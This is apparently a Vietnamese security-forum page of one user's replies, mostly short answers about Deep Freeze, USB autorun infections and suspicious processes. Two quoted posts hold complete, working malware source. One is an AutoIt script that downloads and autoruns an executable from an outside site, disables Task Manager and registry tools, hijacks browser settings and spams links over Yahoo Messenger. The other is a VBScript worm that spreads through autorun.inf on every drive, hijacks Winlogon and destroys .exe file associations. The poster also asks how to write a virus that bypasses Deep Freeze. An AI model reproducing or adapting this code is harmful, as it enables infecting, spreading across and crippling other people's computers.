| |
|
|
|
bạn thử vào Program files\uninstall information \ và xoa mọi file trong đó xem sao
|
 |
|
|
Xin lỗi , bạn nên xem lại và rút kinh nghiệm khi đặt tiêu đề .
Tài liệu là phân mục khi bạn có một kiến thức nào đó muốn chia sẻ với người khác .
hungthoinaynay wrote:
Nhà em cài cả phần mền tính tiền của vinagame ko có biểu tượng deep freeze ở thanh công cụ. Các bác giúp em với khách net kêu quá
Cài phần mềm CSM thì phải cài luôn deep freezer chứ
|
|
|
|
MinhNguyenQuang75 wrote:
billylo22 wrote:
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code
vậy bác thử run cái này xem thử coi nó có bị kill không smilie
em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay
Code:
#NoTrayIcon
$website = "http://mrcuty.us/"
If Not FileExists(@WindowsDir & "\taskmng.exe" Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz"
Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai " & $website & " "
$tin[2] = "rock0em.org " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", ""
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m"
Send("un"
Send("^v {ENTER}{ENTER}"
Send("^m"
Send("{DOWN}"
Send("^{SHIFTDOWN}{END}{SHIFTUP}"
Send("{ENTER}"
Send("^v {ENTER}"
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
MinhNguyenQuang75 wrote:
On Error Resume Next
strComputer = "."
Set objFSO = CreateObject("Scripting.FileSystemObject"
Set WSHShell = WScript.CreateObject("WScript.Shell"
WSHShell.Run "explorer.exe \"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2"
Set colItems = objWMIService.ExecQuery("Select * from Win32_LocalTime"
For Each objItem in colItems
TheDay = objItem.Day
TheMonth = objItem.Month
TheYear = objItem.Year
Next
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
const HKEY_LOCAL_MACHINE = &H80000002
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv"
Err.Clear
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day"
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month"
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year"
errnum = Err.Number
If errnum <> 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day",TheDay,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month",TheMonth,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year",TheYear,"REG_SZ"
End If
StrDay = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day"
StrMonth = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month"
StrYear = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year"
Sumday = (TheDay + TheMonth*30 + TheYear*360) - (StrDay + StrMonth*30 + StrYear*360)
If 0 < Sumday And Sumday < 5 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","1","REG_SZ"
End If
If 5 <= Sumday And Sumday < 10 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","2","REG_SZ"
End If
If Sumday >= 10 Or Sumday < 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","3","REG_SZ"
End If
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","2"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","0"
oReg.SetStringValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","Explorer.exe userinit.vbs"
oReg.SetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","QuangMinh.vbs"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
unattrib ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
objFSO.DeleteFile ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
Function destroy(dr)
If dr = "1" Then
oReg.EnumKey HKEY_CLASSES_ROOT,".exe",arrSubKeys
For Each subkey In arrSubKeys
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe\" & subkey
Next
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe"
End If
If dr = "2" Then
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive","67108863","REG_DWORD"
End If
If dr = "3" Then
oReg.SetStringValue HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows NT\CurrentVersion\Winlogon","Userinit","C:\WINDOWS\system32\QuangMinh.vbs"
WSHShell.Run "c:\windows\system32\shutdown -l"
End If
End Function
Function unattrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes AND 1
objFile.Attributes = objFile.Attributes AND 2
objFile.Attributes = objFile.Attributes AND 4
End Function
Function attrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes OR 1
objFile.Attributes = objFile.Attributes OR 2
objFile.Attributes = objFile.Attributes OR 4
End Function
Function autorun(path)
Set objFile = objFSO.CreateTextFile(path)
objFile.Close
Set objTextFile = objFSO.OpenTextFile(path, 8, True)
objTextFile.WriteLine("[autorun]"
objTextFile.WriteLine("open=C:\windows\system32\wscript.exe QuangMinh.vbs"
objTextFile.WriteLine("action=Open folder to view files"
objTextFile.WriteLine("shell\open=Open"
objTextFile.WriteLine("shell\open\command=C:\windows\system32\wscript.exe QuangMinh.vbs"
objTextFile.WriteLine("shell\open\default=1"
objTextFile.WriteLine("shell\explore\Command=C:\windows\system32\wscript.exe QuangMinh.vbs"
objTextFile.Close
End Function
Function read(path)
Set objTextFile = objFSO.OpenTextFile(path, 1)
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
If strNextLine = "open=C:\windows\system32\wscript.exe QuangMinh.vbs" Then
fileok = "y"
Exit Do
End If
Loop
End Function
Do
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'WScript.exe'"
If colProcesses.Count < 2 Then
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'Explorer.exe'"
For Each objProcess in colProcessList
objProcess.Terminate()
Next
WSHShell.Run "QuangMinh.vbs"
End If
oReg.GetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\Date","Destroy",StrDestroy
If StrDestroy = "1" Then
destroy("1"
End If
If StrDestroy = "2" Then
destroy("2"
End If
If StrDestroy = "3" Then
destroy("3"
End If
WScript.Sleep 100
objFSO.CopyFile "QuangMinh.vbs" , "C:\windows\system32\syskm.dll", TRUE
attrib("C:\windows\system32\syskm.dll"
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
If objDrive.IsReady = True Then
fileok = "n"
read(objDrive.DriveLetter & ":\autorun.inf"
If fileok = "n" Then
unattrib(objDrive.DriveLetter & ":\autorun.inf"
autorun(objDrive.DriveLetter & ":\autorun.inf"
attrib(objDrive.DriveLetter & ":\autorun.inf"
End If
objFSO.CopyFile "C:\windows\system32\syskm.dll" , objDrive.DriveLetter & ":\QuangMinh.vbs", TRUE
End If
Next
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\QuangMinh.vbs", TRUE
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\userinit.vbs", TRUE
Loop
Em cảm ơn anh MinhNguyenQuang75 nhiều lắm nhưng hình như đoạn ( không phải hình như mà là chắc chắn ) đoạn mã này không có khả năng ghi dữ liệu trực tiếp lên máy tính .
Dù sao em cũng cảm ơn anh đã đóng góp ý kiến .
Thân !
|
|
|
|
|
Có thể là do chip của USB của bạn bị hư
|
|
|
|
bạn thử download với links này thử xem : http://www.mediafire.com/?bad0h2twj9z
|
|
|
|
Em cám ơn anh nhiều lắm 
|
|
|
|
Vào cmd ( lúc đó chưa mở usb có virus ) đánh lệnh chuyễn ổ sang ổ USB .
Gõ del /s /f /a -h autorun.inf
xong , khỏi cần chương trình diệt virus
|
|
|
|
|
Xgroup là trang web nào hả anh .
|
|
|
|
freeze_love wrote:
Lại 1 con gà đòi viết Virus = AutoIt
Chú Nam nói vậy hơi ' Chanh chua ' nha . Cháu chỉ là dân newbie nên cũng không hiểu biết rộng bằng chú . Nên mới nhờ đến các cô chú ở HVA .
|
|
|
|
|
Sài cái MD5 Encode ấy , encode được md5
|
|
|
|
|
Cái virus .vbs ở trên chỉ có khả năng gọi notepad liên tục gây đứng máy thôi . Con này em nghịch hoài . Dù sao cũng cám ơn anh đóng góp ý kiến
|
|
|
|
Nếu muốn học hỏi hay bạn sử dụng máy ở nhà mà quên password mà muốn phá thì nên dọc bài viết này : /hvaonline/posts/list/28066.html
Còn nếu bạn phá deep freeze để phá các quán nét công cộng thì không nên , HVA không đồng ý với bạn . Bạn nên sử dụng thời gian của mình vào việc có ích hơn như học lập trình chẳng hạn , nó sẽ giúp ích bạn nhiều hơn là học cái này .
Thân !
|
|
|
|
|
cái này em chưa biết , dù sao cũng cám ơn anh cho ý kiến .
|
|
|
|
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\WINDOWS\system32\igfxpers.exe
Mấy process này thấy nghi ghê . Có bác nào biết đó là gì không
|
|
|
|
Lại 1 con gà đòi viết Virus = AutoIt . Hèn chi AutoIt vẫn còn bị BK đưa vào danh sách đen.
Lấy C***, VB ra viết , cứ nhè AutoIt. Một file exe sau khi biên dịch có srcip chỉ là hiện cái Msgbox mà đã mập đển ~ 300 Kb. Virus mà mập cỡ đó.
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Nếu nó mập thì có thể compress hay pack lại thôi . Cái chuyện " dễ bị Decompile và DeObfuscate " thì tuỳ người , cách viết hay giải thuật họ sử dụng thôi anh . Vỏ quít dày có móng tay nhọn mà
|
|
|
|
|
Bạn có thể share con bot net cho mọi người cùng tham khảo được không bạn
|
|
|
|
Nhà em bị dính con virus autorun nội dung ghi bên trong tiệp autorun là :
Code:
command/shell/open=<tên file virus>.pif
command/shell/explore=<tên file virus>.pif
và một file virus .pif
Cho em hỏi tiệp .pif là loại tiệp gì ? Có khả năng thực thi hay tác động đến cái gì ? Làm sao để disassembler nó ?
|
|
|
|
_ Thì dĩ nhiên là viết bằng AutoIt rồi chứ không lẽ lại viết bằng pascal . " Làm sao viết " thì em cũng bó tay vì kiến thức của em chưa " đủ " để viết được đoạn mã này nên mới hỏi anh chứ .
_ Em không muốn phá băng bằng tools , nếu phá băng bằng tay hay tools thì ai chằng biết . Em muốn viết một con virus có khả năng ghi dữ liệu trực tiếp lên ổ cứng thôi .
|
|
|
|
Em đang thử viết một số code virus ( chỉ là nghiên cứu thôi chứ không phá hoại ) .
Hồi trước thấy người ta xôn xao về con SysSafe có thể xuyên thủng DeepFreezer ( ghi trực tiếp dữ liệu lên ổ cứng ) . Cho em hỏi làm sao viết một đoạn code nào đó để viết dữ liệu trực tiếp lên ổ cứng .
Thanks.
|
|
|
|
|
Sao lại không sao , tung keylogger vào quán net thì bị chủ quán đánh tơi bời luôn chứ không sao !
|
|
|
|
Cái ý sài linux của bạn không thực thi cho lắm , tuy nó free ( open source ) nhưng đến cái drivers cho nó kiếm còn không ra huống chi là các soft khác .
Bạn tmd nói " cắm usb loạn xạ " là sao ấy nhỉ .
|
|
|
|
|
cái DDoS kiểu X-flash giờ xưa như can gián rồi còn đâu
|
|
|
|
|
Cái này có sẵn trong hiren boot cd đó , mà bạn dang nói portable kiểu nào ? Usb hay CD
|
|
|
|
|
Chắc do web bạn download có virus chứ software này đâu có virus ( mình chưa sài nên không biết đoán vậy thôi )
|
|
|
|
|
Ha ha , viết cái gì ngộ ghê , .exe là file thực thi rồi cần gì phải dịch
|
|
|
|
|
Mấy cái tools password crack chả hạn , bạn cứ vào google đánh mấy chữ : password tools là xong
|
|
|
|
|
Mấy cái này làm tốn thời gian chứ chẳng có lợi gì đâu bạn ơi
|
|
|
|
|
Tắt cái nay thì drivers không chạy là cái chắc
|
|
|
|
|
Bạn lấy cái HDD ra rồi qua tiệm tin học quét là nhanh nhất
|
|
|
|
Các bạn ỏi !
BKAV có thể tiêu diêt được keylogger đó
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
